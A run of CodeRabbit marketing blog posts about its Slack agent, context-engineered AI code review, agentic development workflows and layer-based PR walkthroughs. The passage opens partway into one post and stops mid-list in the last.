Their first action is reading [what the agent already found](https://docs.coderabbit.ai/slack-agent/automations#triggers) and deciding what to do about it. Same agent. Same scope. Same instructions you'd have typed. The only thing that changed is who, or what, started the turn. The mechanic underneath is almost aggressively unglamorous: a source, a rule for which events are worth a run, instructions, and a destination. That's it. That small thing is what moves the agent from "useful when addressed" to "useful when it matters," and those are not the same product. %[https://youtu.be/bBBsXSvIm7Q] ## This changes the human's job, for the better In the prompt model, the human is the engine, and nothing happens until we take a turn. The agent is idle until addressed, and the human spends their attention starting it: noticing, framing, typing. In the trigger model, the agent is the engine and the human is judgment. The agent handles the monitoring and the legwork. The person does the part that was always theirs: deciding whether the revert is right, whether this is a SEV-2, whether to ship it now or wait. That's a strictly better division of labor. You want the expensive, irreplaceable thing, human judgment, spent on the decision and not on being a glorified start button. This is also the part people mean and don't quite say when they call an agent a "second brain." A second brain that only works when you address it is not a second brain. It's a reference desk. The useful version is the one that was already working on the problem before you asked. ## "I don't want it running around unsupervised" Good, you shouldn't, and it isn't. This is where the inversion gets misread as recklessness, so be precise about what actually happens. The agent runs under the scope of the channel it lives in: only the repositories, connections, and spend that surface allows, no matter what any instruction says. It fires only on sources you explicitly allowlisted, not on ambient chatter. 
It runs once as a trial on a real event before it ever goes live, so you correct the instructions before they're loose. And it posts into the thread where the team is already looking, which means the output is supervised by default. It lands in front of people, not in a log nobody reads. Supervision didn't disappear. It moved off the front of the task, the part where a human had to notice and ask, and onto the back, where a human reviews and decides. An agent that does its best work while you're asleep should be billed like time spent, not like a chat transcript, which is the entire reason we meter the active minute and not the token. ## Take the training wheels off Stop evaluating your agent by how well it answers prompts when you remember to ask. That benchmark rewards the chat box and quietly caps the agent at your attention span. Evaluate it by [what's already in the thread when you wake up](https://docs.coderabbit.ai/slack-agent/automations#triggers), the incident already triaged, the bad PR already found, the advisory already summarized with a recommended next step, none of it requested. The @mention starts to feel like what it always was: training wheels. A way to get going while you and the agent don't trust each other yet. Useful, real, not the destination. The best agent in your Slack is the one you never addressed. Build toward that one, and then take the training wheels off. Get started with [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent)
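The trigger mechanic described in this post (a source, a rule for which events are worth a run, instructions, and a destination) can be sketched in a few lines. This is a minimal illustration, not CodeRabbit's API: the `Event`, `Trigger`, and `handle` names, the 500 ms threshold, and the channel name are all assumptions made for the example.

```python
from dataclasses import dataclass
from typing import Callable

# Hypothetical types for illustration only; not CodeRabbit's actual API.

@dataclass(frozen=True)
class Event:
    source: str    # where the event came from, e.g. "datadog"
    kind: str      # what happened, e.g. "latency_alert"
    payload: dict  # event details

@dataclass(frozen=True)
class Trigger:
    source: str                    # which allowlisted source to listen to
    rule: Callable[[Event], bool]  # which events are worth a run
    instructions: str              # what you would otherwise have typed
    destination: str               # channel or thread that receives the result

def handle(event: Event, triggers: list[Trigger], allowlist: set[str]) -> list[tuple[str, str]]:
    """Return (destination, instructions) pairs for every trigger the event fires."""
    if event.source not in allowlist:
        return []  # events from sources that are not allowlisted never start a run
    return [
        (t.destination, t.instructions)
        for t in triggers
        if t.source == event.source and t.rule(event)
    ]

latency = Trigger(
    source="datadog",
    rule=lambda e: e.kind == "latency_alert" and e.payload.get("p99_ms", 0) > 500,
    instructions="Pull traces, walk recent deployments, and post the likely cause.",
    destination="#eng-incidents",
)

runs = handle(Event("datadog", "latency_alert", {"p99_ms": 820}), [latency], {"datadog"})
print(runs)
```

The allowlist check comes first on purpose: in this sketch, no rule is even evaluated for a source nobody approved.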

Explainable reviews: CodeRabbit Review and the context engine that make it possible

Yiwen Xu — Tue, 19 May 2026 00:00:00 GMT

CodeRabbit is the verification layer and quality gate that developers and organizations trust. But a great review does more than point out bugs or suggest fixes. It helps teams trace a change from implementation back to intent: what changed, why it matters, how to improve it, and whether it is safe to ship. That job is becoming harder as developers rely more on coding agents. AI is already changing the shape of software delivery: teams with high AI adoption are merging 98% more pull requests while spending 91% more time on review, according to a [Faros AI study](https://agentmarketcap.ai/blog/2026/04/13/91-percent-pr-review-bottleneck-ai-coding-agents-code-review-crisis-2026?utm_source=chatgpt.com) of more than 10,000 developers. When more code is being produced and shipped faster, review cannot just be about catching bugs. Teams need a better way to understand what changed, why it matters, and how it connects to the rest of the system before it ships. This is the idea behind [explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent). [Harjot Gill](https://www.linkedin.com/in/harjotsgill), our CEO, has framed this as the agentic-era equivalent of cloud observability. As more coding work shifts to AI agents, humans need a new interface for understanding and trusting the output. Explainability is becoming the new observability: the layer that helps teams see, understand and verify what their systems and their agents are doing. ## From understanding the diff to understanding the change Recently we launched [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface), a new AI-native review interface that walks reviewers through a pull request like a senior engineer would. CodeRabbit already helps teams understand changes through summaries, walkthroughs, logic diagrams, and actionable review comments. 
CodeRabbit Review builds on that foundation by showing the path through a change: not just what changed, but how the pieces connect. ![GitHub bot comment displaying a "Review Change Stack" button and failed pre-merge checks.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_a50be3e3d4.png) As developers write less code by hand and rely more on agents to generate it, review shifts from "is this diff correct?" to "did the system build what we intended?" We call this [reviewing intent](https://www.coderabbit.ai/blog/nobody-is-going-to-read-the-code): verifying the plan and the outcome, not just the keystrokes. The diff has been the default review interface for nearly two decades. CodeRabbit Review shows what becomes possible when the system can explain the shape of a change and help developers verify that it matches their intent. For example, CodeRabbit reviews PRs using semantic diffs. Traditional line-by-line diffs treat a renamed variable, a reformatted block, and a real logic change as equally important, forcing reviewers to separate signal from noise by hand. Semantic diff understands the structure of the change. It filters out irrelevant changes, detects moved code, and surfaces only the changes that matter. Reviewers see what actually changed, so they can review code faster and more accurately. That experience is only possible because of the deeper system underneath: context engineering that understands intent, connects changes across files, reasons about impact, and explains the path through a pull request. ## What it actually takes to deliver explainable reviews: context engine and harness engineering At CodeRabbit, a trustworthy and explainable review starts long before the review comment is written. ### Inside the context engine For every PR, we build the context the model needs to reason accurately.
We clone the repo, analyze the diff, and construct a code graph that traces how the change connects to the rest of the codebase, cross-file and cross-repo. The context engine then pulls in the surrounding engineering knowledge (linked issues, architecture standards, custom review instructions, coding conventions, past PRs, team-specific [learnings](https://docs.coderabbit.ai/knowledge-base/learnings), and, through [MCP](https://docs.coderabbit.ai/knowledge-base/mcp-context#how-coderabbit-uses-mcp-during-analysis), the documents and systems your team builds against) and filters all of it down to what is relevant to this specific change. Signals from [40+ linters and SAST tools](https://docs.coderabbit.ai/tools) feed in alongside, real-time web queries pull current release notes and newly disclosed vulnerabilities, and everything runs in an ephemeral, isolated sandbox with zero data retention. This is the work behind the work. Much of our system's effort goes into context enrichment. The hard part isn't asking an LLM to review a diff. It's giving the model the right context, in the right order, at the right level of detail so it can understand intent, reason through impact, and explain its findings clearly. ![Flowchart illustrating an AI-powered code review process emphasizing context enrichment and agent-based verification.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_9040bacf39.png) ### The harness around it The harness around the context engine matters just as much. It routes each task to the right model by complexity: cheap and fast where deep reasoning isn't needed, frontier where it is, open models where they meet our quality bar. A review agent surfaces possible comments; verification agents filter them against the code guidelines, configuration, and team preferences before review comments reach developers.
Underneath all of it sits an evaluation framework that tests every model release, prompt change, and context strategy against recall, precision, latency, and cost. That feedback loop is how we improve quality without just throwing more tokens at the problem. This is the system around the system: context retrieval, ranking, filtering, sandboxing, tool orchestration, prompt design, model routing, verification, and evaluation loops all working together. CodeRabbit has spent three years refining this harness across millions of pull requests and more than 15,000 engineering teams. That accumulated domain expertise, knowing which context matters for which kind of change, is the difference between a system that summarizes diffs and one that finds the issues that could derail what you intended to ship. ## Try CodeRabbit Review AI can write the code, but your team is still responsible for what ships. CodeRabbit is the AI-native quality gate that helps teams move fast without losing control. It provides instant explainability for every change and enforces consistent standards across every pull request, so what ships matches what you intended. Try [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) on the next large PR in your queue. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking **Review Change Stack** in the CodeRabbit PR summary comment.
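To make the recall and precision part of that evaluation loop concrete, here is a minimal sketch of how the two numbers could be computed for one review run. It assumes a labeled set of known issues per PR; the `precision_recall` helper and the issue labels are hypothetical and say nothing about how CodeRabbit's evaluation framework is actually built.

```python
def precision_recall(flagged: set[str], real_issues: set[str]) -> tuple[float, float]:
    """Score one review run against a labeled set of known issues."""
    true_positives = len(flagged & real_issues)
    # Precision: how much of what the reviewer flagged was a real issue.
    precision = true_positives / len(flagged) if flagged else 0.0
    # Recall: how many of the real issues the reviewer actually found.
    recall = true_positives / len(real_issues) if real_issues else 0.0
    return precision, recall

# Hypothetical labels for a single pull request.
flagged = {"race-condition", "null-deref", "style-nit"}
real_issues = {"race-condition", "null-deref", "sql-injection", "off-by-one"}

precision, recall = precision_recall(flagged, real_issues)
print(f"precision={precision:.2f} recall={recall:.2f}")  # precision=0.67 recall=0.50
```

Tracking both matters because they pull against each other: flagging everything raises recall and buries reviewers in noise, while flagging almost nothing looks precise and misses the issues that count.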

CodeRabbit Agent for Slack in action: Four workflows we caught on tape

Konrad Sopala — Tue, 19 May 2026 00:00:00 GMT

It's Monday, 9:14am. You open Slack and there are 47 unread channels, six DMs that start with "quick question," a Linear ticket someone @-mentioned you in on Friday afternoon, a Datadog alert from Sunday night that someone else already acked, and a customer escalation in \#eng-support that you can't tell is a known issue or a fresh regression. You haven't opened your IDE yet. You won't for another hour. The "real work" hasn't started because the context retrieval hasn't finished. This is the part of engineering nobody benchmarks. And it's the part [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) was built for. We've been recording short demos of CodeRabbit folks putting the agent to work on the workflows that actually fill an engineer's day. Below are four of them. Each one is a thing a person used to do manually, in 12 tabs, that now happens in a thread. ## 1. Hourly stale PR nudges, with the "what's this even about" baked in %[https://youtu.be/l3ANbujlgOc] If you're an engineering manager, you know the cadence. A PR opens Tuesday. By Thursday it's idle. By the following Wednesday it's a merge conflict, an outdated dependency, and a Slack apology thread. Stale PRs don't go stale because reviewers are lazy. They go stale because nobody on the channel can tell, at a glance, *what the PR is actually about* and whether it's blocking anything important. The PR title says "fix flaky test." Maybe. Maybe it's the auth refactor in disguise. Here's the automation: every hour, the agent scans open PRs idle for more than 8 hours. In your engineering channel, it posts one thread per stale PR with: * The author, @-mentioned * The assigned reviewer, @-mentioned * A one-line "what's this PR about" summary written from the diff and the description \- not the title That last bullet is the one that earns its keep. You scroll the channel, read the summary, and know in 30 seconds which PRs deserve your attention and which can wait until standup.
The author gets a nudge that isn't passive-aggressive because it comes with context the reviewer actually needs. Yes, hourly is aggressive. It's also tunable: every 4 hours, twice a day, whatever cadence your team can absorb. ## 2. The "what shipped to prod this week" brief %[https://www.youtube.com/watch?v=Ahio4TrAxLY] At CodeRabbit, engineering ships constantly. New models, new finishing touches, new agent capabilities. Sometimes it's hard to keep up even from the inside. Marketing, support, and even other engineers can fall behind on what landed in prod during the week. That's why we have the agent brief us weekly on everything that's been pushed. Every week, in our internal channels, the agent drops: * Merged PRs grouped by area (agent, reviews, infra, IDE) * Customer-facing changes worth surfacing in release notes * Internal-only changes that affect how the team works * The deploys that actually went out, with timestamps * and many more… It's the changelog before the changelog. The product marketing team uses it, support uses it, new hires use it. If you've ever joined a fast-moving team and felt like the org was a black box for the first month, you know exactly why this works. It's not a status meeting. It's not a Notion page nobody updates. It's a digest that writes itself, delivered where the team already reads. ## 3. Pylon ticket, Datadog, Linear \- PR merged. All in one thread. %[https://www.youtube.com/watch?v=XTFLmli2wmk] Internally, this is our favorite workflow. And when we show it to customers, it's the one that makes it clear how CodeRabbit Agent for Slack could work inside other organizations. A customer ticket lands in Pylon. A support engineer pastes it into \#eng-support and tags the agent.
From there, in one Slack thread: * The agent reads the ticket and pulls the relevant DataDog traces * It correlates with the last 24 hours of merges and figures out which PR introduced the regression * It files a Linear issue with repro steps and assigns it to the right engineer * It drafts the fix PR and posts it for review * The PR gets reviewed, merged, and the agent replies in the original thread when the fix is out **Historically, this workflow was managed by three to four people and five tools. Now, it lives in one thread.** I'd like to call out here that not only did the agent do all of it, but the team saw all of it as well in a public channel. Support knew where their ticket went. Engineering knew where the lead came from. Anyone scrolling the channel a week later has the full incident trail, decisions and all, sitting in chronological order. The async dispatch model where you "send a task and wait" is replaced by a synchronous workflow the team can steer mid-flight. That last part is what we mean by an [agentic SDLC](https://coderabbit.ai/guides/agentic-sdlc). An agent that operates across the tools you already use, in the place you already work. ## 4. Monday-morning catch-up across the org %[https://youtu.be/a1_t-EVZbzw] You log off Friday. You come back Monday. The org didn't stop. A typical Monday playbook: skim 12 channels, click through GitHub notifications, find the design doc someone updated, figure out which incident in \#eng-incidents was actually serious, miss something important. Or: DM the agent. "Catch me up on the weekend." It goes through the org repos, the channels you have access to, the merged PRs, and the threads with activity, and gives you the brief. Not "here's everything that happened" but here's what's worth your attention. The PR that broke the staging deploy. The Linear ticket your teammate handed off to you on Saturday. The customer thread in \#eng-support that's still open. 
The architecture debate in \#platform that's about to surface at 11am. You read it in two minutes, and walk into your first meeting actually knowing what's happening. ## What ties these four together None of these are new ideas. Engineering teams have been writing scripts to do versions of this for years: cron jobs, custom Slack bots, internal newsletters someone heroically maintains for three months before life gets in the way. What's different now is that the agent has context. It reads your repo, your tickets, your traces, your threads and it scopes that access per channel, per team, per workspace. Spend, access, and memory are governed at the org level, not pushed down to whichever engineer felt like installing a CLI tool on Tuesday. That's the part that makes the four demos above repeatable instead of one-off magic tricks. The IDE was the right center of gravity when code was the system. Today, the system is the system and Slack is where the team actually talks about it. ## Try out CodeRabbit Agent for Slack Install it, add it to a channel, tag it in a thread and pick one of the workflows above to try first. [Get started with CodeRabbit Agent for Slack](https://coderabbit.link/cr-agent)
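For readers who want to see the shape of the first workflow, the stale PR rule (open PRs idle for more than 8 hours, one message per PR with author, reviewer, and summary) reduces to a small filter. The sketch below is an illustration under assumptions: `PullRequest`, `stale_prs`, and `nudge_message` are hypothetical names, the sample data is invented, and the summary is passed in as a plain string where the agent would write it from the diff.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Hypothetical record; a real integration would fill this from the Git platform.
@dataclass
class PullRequest:
    number: int
    author: str
    reviewer: str
    summary: str             # one-line "what's this PR about" summary
    last_activity: datetime  # timestamp of the most recent activity

def stale_prs(prs: list[PullRequest], now: datetime,
              idle_threshold: timedelta = timedelta(hours=8)) -> list[PullRequest]:
    """Keep only PRs that have been idle longer than the threshold."""
    return [pr for pr in prs if now - pr.last_activity > idle_threshold]

def nudge_message(pr: PullRequest) -> str:
    """One message per stale PR: author, reviewer, and the summary."""
    return f"PR #{pr.number}: @{pr.author} @{pr.reviewer} - {pr.summary}"

now = datetime(2026, 5, 19, 9, 0, tzinfo=timezone.utc)
prs = [
    PullRequest(101, "alice", "bob", "Refactors token refresh in the auth client",
                now - timedelta(hours=30)),
    PullRequest(102, "carol", "dave", "Fixes a flaky retry test",
                now - timedelta(hours=2)),
]

messages = [nudge_message(pr) for pr in stale_prs(prs, now)]
print(messages)
```

Making `idle_threshold` a parameter mirrors the tunable cadence described above: the rule stays the same while the team picks how patient it should be.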

From intent to merged PR: The Agentic SDLC workflow teams are running in production with CodeRabbit

David Kravets — Mon, 18 May 2026 00:00:00 GMT

If you've been following the conversation around agentic development, you know the bottleneck has moved. Planning is the new quality gate. Review needs to run at the speed of generation. The conceptual case is made. What's harder to find is a concrete, end-to-end workflow that shows how those principles connect in practice, one with the tools, the sequence, and the evidence of what happens when teams actually run it. If you want the conceptual foundation, start with our [agentic SDLC guide](https://www.coderabbit.ai/guides/agentic-sdlc). What follows picks up where that leaves off, step by step, with some customer results to back it up. ## The real problem is coding speed's shadow Most teams adopting coding agents hit the same wall. The first few demos look great. A developer pastes a prompt into Claude Code, Codex, Cursor, or another agent and gets working code back in minutes. Everyone sees the upside immediately. Then production reality shows up. The ticket was underspecified. The prompt missed a constraint. The agent changed the right file in the wrong way. The pull request grew beyond scope. The review thread turned into a requirements clarification meeting. The model could code, but the workflow needed to catch up. Agents scale ambiguity into code. A workflow built for humans who self-correct slowly will buckle under that pressure. So a working agentic SDLC needs to catch misalignment before implementation, surface issues while context is still local, and enforce standards before merge. %[https://youtu.be/QH1DFN5IK6c?si=gtoXY75Z4t-yH50f] [Abnormal AI](https://www.coderabbit.ai/case-studies/how-abnormal-ai-scales-autonomous-development-with-coderabbit) learned this firsthand. As the cybersecurity company accelerated AI-generated code across 250 engineers, human review became the bottleneck. Output was scaling. The cost of getting something wrong stayed just as high. 
As Shrivu Shankar, VP of AI Strategy at Abnormal AI, put it: "AI-native tooling lets teams produce more code changes much faster, but the penalty for getting something wrong doesn't shrink. A subtle bug, a security issue, or a misaligned implementation still costs real time to diagnose, fix, retest, and potentially respond to." The teams winning with agents right now are building workflows around that question. Here is what that CodeRabbit workflow looks like: ## Step 1: Start with intent, before implementation Most bad agent workflows fail before a single line of code is written. They fail when a vague ticket gets treated like an execution-ready specification. "Add dark mode." "Support SSO." "Clean up auth." "Improve onboarding." Humans know those tickets are incomplete. Agents will run with them anyway. That is why the modern workflow starts with planning. [CodeRabbit Plan](https://www.coderabbit.ai/plan) turns an idea, ticket, or rough prompt into something an agent can actually use. Instead of treating planning as lightweight administrative work, it becomes the control layer for the rest of the agentic SDLC. ![Dark UI for creating a plan: input field, repository selector, and 'Create plan' button.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_05_15_at_12_38_02_PM_76d8f562eb.png) A good plan packages the context that implementation depends on: * What the system is supposed to do * Which files and components are likely involved * Which architectural decisions already exist * What related issues or prior pull requests matter * Where the likely constraints and edge cases live * What a phased implementation should look like The difference between a productive agent run and a costly one usually comes down to framing, whether the task carries enough context and specificity to avoid confident mistakes. Abnormal AI's engineering workflow illustrates why this matters. 
Rather than allocating tickets in standups, their teams write detailed specs collaboratively and delegate those specs to agents that implement changes in parallel. Human attention moves upstream, to writing clear intent and constraints, and downstream, to validation. CodeRabbit Plan is built to bring that same discipline to teams still figuring out how to structure the handoff between intent and implementation. ## Step 2: Convert the plan into an agent-ready handoff Traditional tickets are written for humans. Agentic workflows, however, need something more structured. The handoff has to preserve intent, constraints, and sequence. A high-level feature description is not enough. ![Open dropdown menu displays Cursor, VS Code, and Windsurf options in a dark interface.](https://victorious-bubble-f69a016683.media.strapiapp.com/agent_handoff_ec7191d3c5.png) Most teams end up doing invisible labor here. Someone reads the issue, digs through the codebase, finds related decisions in docs or old threads, figures out how the system actually works, and rewrites all of that into a better prompt for the agent. That work prevents rework. It just happens to be unglamorous. [CodeRabbit Plan](https://www.coderabbit.ai/plan) makes that work explicit. Instead of one developer mentally repackaging context for an agent, the workflow produces phased tasks, design rationale, research notes, and an agent-ready prompt that can be reviewed before execution. The handoff improves in two ways. First, the prompt is grounded in actual codebase and workflow context. Second, the plan becomes collaborative rather than living inside one developer's context window. This is the first major shift in the agentic SDLC. In the old flow, collaboration happened mostly after implementation, inside the pull request. In the new flow, teams align on the plan before the code exists. 
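One way to picture an agent-ready handoff is as a structured plan rendered into a prompt, so that intent, constraints, and sequence survive the trip. The sketch below is an assumption-laden illustration: the `Plan` fields, the `render_prompt` helper, and the dark mode details are hypothetical, and this is not the format CodeRabbit Plan produces.

```python
from dataclasses import dataclass, field

# Hypothetical plan structure for illustration only.
@dataclass
class Plan:
    goal: str
    files: list[str] = field(default_factory=list)        # files likely involved
    constraints: list[str] = field(default_factory=list)  # decisions the agent must respect
    phases: list[str] = field(default_factory=list)       # ordered implementation steps

def render_prompt(plan: Plan) -> str:
    """Render the plan as a prompt that preserves intent, constraints, and sequence."""
    lines = [f"Goal: {plan.goal}", "", "Likely files:"]
    lines += [f"- {path}" for path in plan.files]
    lines += ["", "Constraints:"]
    lines += [f"- {constraint}" for constraint in plan.constraints]
    lines += ["", "Phases (complete in order):"]
    lines += [f"{i}. {phase}" for i, phase in enumerate(plan.phases, start=1)]
    return "\n".join(lines)

plan = Plan(
    goal="Add dark mode to the settings page",
    files=["web/theme.ts", "web/settings/Appearance.tsx"],
    constraints=["Reuse the existing theme tokens", "Do not change the public API"],
    phases=["Add dark theme tokens", "Wire the toggle into settings", "Add tests"],
)

prompt = render_prompt(plan)
print(prompt)
```

Because the plan is data before it is a prompt, teammates can review and amend it before any agent runs, which is the collaborative step this section describes.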
## Step 3: Let the agent implement, with review close to the work Once the plan is solid, the agent can do what it does best, execute. ![AI era planning steps: decomposing problems, specifying criteria, context, feedback loops, and safety design.](https://victorious-bubble-f69a016683.media.strapiapp.com/Planning_in_the_AI_era_f38ac443f2.png) This is where the workflow branches by developer preference. Some teams work in terminal-native agents. Some use IDE-native assistants. Some operate inside Codex. The specific surface matters less than what happens next. Review should stay close to the work. That is why local workflows matter. [CodeRabbit Skills](https://www.coderabbit.ai/agent), the [CodeRabbit CLI](https://www.coderabbit.ai/cli), and the [CodeRabbit plugin for Codex](https://www.coderabbit.ai/agent) all move review into the same environment where code is being written and iterated on. When review stays in-session, a developer can catch issues while full implementation context is still fresh, ask the agent to fix problems immediately, and re-run review without switching tools. [Clerk's](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) engineers found this particularly valuable. Before CodeRabbit, getting early feedback meant waiting—sometimes overnight—for teammates in other time zones to review early-stage work. With in-session review available, Brandon Romano, Senior Staff Engineer at Clerk, described the shift directly: "I personally find it really nice that the time to first review is now minutes. I can fix it in my editor before I waste any time." In an agentic workflow, shorter validation loops matter more than shorter coding loops. Coding is already fast. Correcting wrong-but-plausible code is where teams lose time. 
## Step 4: Open the PR after local review has already done some work The worst version of AI-assisted development is when a large volume of low-confidence code lands in a pull request, and review becomes the first serious validation step. That is how review turns into cleanup. A better workflow uses local review to catch obvious issues earlier, then uses pull request review as the shared decision point for the team. CodeRabbit's PR review layer serves that next step. Once code reaches the Git platform, the workflow shifts from helping one developer to helping the team converge on mergeable changes. The questions change: What real bugs or risks remain? Which findings are worth fixing now? Where is the change over-scoped or under-specified? [Common App](https://www.coderabbit.ai/case-studies/how-common-app-cut-code-review-time-by-35-percent-and-found-more-bugs) saw this dynamic clearly. Before CodeRabbit, their process required two manual reviewers per pull request, working through a detailed internal checklist, and still missing critical issues. After adopting CodeRabbit, they reduced code review time by 35% and dropped to a single human reviewer per PR. CodeRabbit was handling baseline issues, freeing that reviewer to focus on business logic. Principal Software Developer Amit Kumar put it concretely: "Recently, CodeRabbit flagged a race condition," he said. "Race conditions are difficult to catch manually, but CodeRabbit picked it up immediately." The measure that matters is high signal: catching what the team should act on before merge. ## Step 5: Remediate in one pass Even when review is good, the remediation workflow can drag. A pull request with 10 useful comments still requires the developer to move each one into an agent separately. Copy, paste, run, and repeat, just to get back to a clean review state. Issue detection needs a fix path.
CodeRabbit, however, collects the prompts from review findings and turns them into a single structured instruction an agent can work through in one pass. Less busywork moving comments between tools. Fewer missed fixes. Faster convergence from review to merge. This is the second major shift in the agentic SDLC. Review becomes part of an iterative fix-and-verify loop, rather than a diagnostic stage the developer exits before remediation begins. ## Step 6: Enforce the definition of done before merge Even after a plan is approved, code is generated, the PR is reviewed, and issues are fixed, there's one failure mode remaining. Teams forget things. The issue goes unlinked. The PR description stays incomplete. Sensitive data appears in logs. Required docstrings are missing. A change works technically but falls short of the team's merge standards. In a high-volume, agent-assisted workflow, these failures become more common. More changes move through the system, and standards that live only in people's heads do not scale. [Pre-Merge Checks](https://www.coderabbit.ai/#features) become the final control layer. They turn team expectations into enforceable rules that run automatically on pull requests. Some are built-in. Others can be written in plain English to reflect team-specific requirements. %[https://youtu.be/knoETRikfwg?si=YZCDktE1Ywo7-ASS] Enforcement that runs automatically, independent of whether a reviewer remembered the checklist that day, is what keeps the agentic SDLC reliable under higher code volume. ## What the full workflow looks like in practice Put it all together and the sequence is: ![Diagram detailing CodeRabbit AI Agent architecture, including clients, cloud run, knowledge base, and LLM providers.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Rabbit_Architecture_7f41b7d4b0.avif) A vague idea or ticket enters the system. [CodeRabbit Plan](https://www.coderabbit.ai/plan) turns that intent into a phased, context-rich plan.
The plan becomes an agent-ready prompt with relevant codebase, issue, and knowledge context. A coding agent implements the change in the developer's preferred environment. CodeRabbit reviews the changes locally through the [CLI](https://www.coderabbit.ai/cli), [Skills](https://www.coderabbit.ai/agent), or an in-session plugin flow. The pull request opens with better code and fewer obvious issues. CodeRabbit catches remaining problems, surfaces what matters, and helps the developer remediate review findings in one pass. [Pre-Merge Checks](https://www.coderabbit.ai/#features) enforce the team's non-negotiable rules. The pull request merges with less back-and-forth and less policy drift. Each step targets a different failure mode introduced by faster code generation. Planning reduces misalignment. Local review reduces context loss. PR review reduces escaped issues. Autofix remediation reduces friction. Pre-merge enforcement reduces inconsistency. The teams that get this right are the ones generating code with confidence, and shipping it the same way.
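The definition-of-done idea from Step 6 can be illustrated as a table of named rules evaluated against every pull request. This is a rough sketch under assumptions, not how Pre-Merge Checks are implemented: `PullRequestInfo`, `CHECKS`, and `failed_checks` are hypothetical names, the 50-character description minimum is arbitrary, and the string match for secrets is a deliberately crude placeholder.

```python
from dataclasses import dataclass
from typing import Callable

# Hypothetical view of a pull request; field names are assumptions.
@dataclass
class PullRequestInfo:
    description: str
    linked_issues: list[str]
    diff: str

Check = Callable[[PullRequestInfo], bool]

# Each rule returns True when the pull request passes.
CHECKS: dict[str, Check] = {
    "issue is linked": lambda pr: len(pr.linked_issues) > 0,
    "description is complete": lambda pr: len(pr.description.strip()) >= 50,
    # Crude placeholder: a real check would need far more than a substring match.
    "no password in diff": lambda pr: "password" not in pr.diff.lower(),
}

def failed_checks(pr: PullRequestInfo) -> list[str]:
    """Return the names of all rules the pull request fails, in definition order."""
    return [name for name, check in CHECKS.items() if not check(pr)]

incomplete = PullRequestInfo(
    description="Fix",
    linked_issues=[],
    diff="logger.info(user.password)",
)
print(failed_checks(incomplete))
```

Keeping the rules in one table is the point of the step: the standard lives in the repository's configuration instead of in a reviewer's memory.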

A major walkthrough upgrade: Explainable PRs and smarter reviewer routing

Konrad Sopala — Thu, 14 May 2026 00:00:00 GMT

Two updates to the CodeRabbit PR walkthrough went live recently, and together they're a meaningful upgrade to what the walkthrough actually does. One changes how you read a PR, and the other changes how it gets routed to reviewers. They sit in different parts of the flow, but they pull in the same direction: the walkthrough should explain the PR, not just describe it. A flat diff describes. A flat list of suggested reviewers describes. Neither helps you actually trust the change, or get it in front of the right people. These two updates do. ## Layer Based Walkthroughs: Read the PR in the order it was actually built You open a PR. The file list is alphabetical. ``` api/ db/ services/ tests/ utils/ web/ ``` You start scrolling and try to reconstruct what happened: was the migration the starting point, or did it come after the API change? Is this new service the cause of the type changes downstream, or a consequence? Where do the tests fit? This is the price of a flat diff. The order you read the changes in has no relationship to the order they were made in, or to which parts depend on which. You spend the first few minutes of every PR sorting that out before you can evaluate anything. It gets worse with AI-authored PRs. They tend to be larger and touch more files at once, so the mental reconstruction tax gets paid more often. And the cost of getting it wrong is higher, because there isn't a human across the desk to ask what they were thinking. We've written before about [explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent), the idea that AI systems doing real work on things that matter have to show their homework, or the trust never quite materializes. A flat diff is the opposite of that. It tells you what changed, not how the change was reasoned about, what depends on what, or in what order things had to happen for the whole thing to make sense. The burden of figuring that out lands on whoever opens the PR. 
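To make the gap between alphabetical order and dependency order concrete, here is a minimal sketch that sorts a handful of changed files so each one appears after the files it depends on. The file names and the dependency map are hypothetical, invented for this example, and Python's standard-library topological sort stands in for whatever analysis a real tool performs. It is not a description of how CodeRabbit derives its ordering.

```python
from graphlib import TopologicalSorter

# Hypothetical changed files, each mapped to the changed files it depends on.
DEPENDS_ON = {
    "api/invoices.py": {"services/billing.py"},
    "db/migrations/001_add_invoice.sql": set(),
    "services/billing.py": {"db/migrations/001_add_invoice.sql"},
    "tests/test_invoices.py": {"api/invoices.py"},
    "web/InvoiceList.tsx": {"api/invoices.py"},
}


def alphabetical_order(depends_on):
    """The order a flat file list gives you."""
    return sorted(depends_on)


def dependency_order(depends_on):
    """An order in which every file comes after the files it depends on."""
    return list(TopologicalSorter(depends_on).static_order())


if __name__ == "__main__":
    print("alphabetical:", alphabetical_order(DEPENDS_ON))
    print("dependency:  ", dependency_order(DEPENDS_ON))
```

The alphabetical list starts with the API file, while the dependency order starts with the migration that everything else builds on. Files with no dependency between them (here the tests and the frontend consumer) can come out in either order.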
%[https://youtu.be/nT_YZuaE4Nw] Layer Based Walkthroughs are CodeRabbit's answer. Instead of an alphabetical file list, CodeRabbit reverse engineers how the change was actually built and organizes it into logical layers: what was changed first, what came next, and what depends on what. A typical PR walkthrough might be ordered: 1. Data models and schema changes 2. Backend logic that uses the new model 3. API responses that surface the new shape 4. Frontend or consumers that read the new responses 5. Tests covering the above ![GitHub walkthrough page detailing payment intent and calendar export system changes in a summary table.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_2eec9b71de.png) Each layer comes with its own summary scoped to the changes inside it. You can read top-down for the full story, or jump to the layer that matters most to the kind of review you're doing. Security folks tend to want the boundary stuff, frontend folks tend to want the responses. It works the same way whether a human or an AI agent wrote the changes. But the AI case is where it pays off most: when you can't ask the author what they were thinking, the walkthrough has to show the work instead. Layer Based Walkthroughs are how CodeRabbit does that. ## Suggested reviewers instructions: CodeRabbit says who reviews what CodeRabbit has had suggested reviewers in the walkthrough for a while now. The suggestions come from git history and code ownership, which works well in steady-state codebases where the right reviewer for a file is whoever's been touching it recently. It works less well in two cases: * The right reviewer isn't the most recent contributor. They're the subject matter expert for that area: the security team for anything in auth/, the data platform team for any migration, the SRE on call this week for infra changes. * The right reviewer is a team, not a person. 
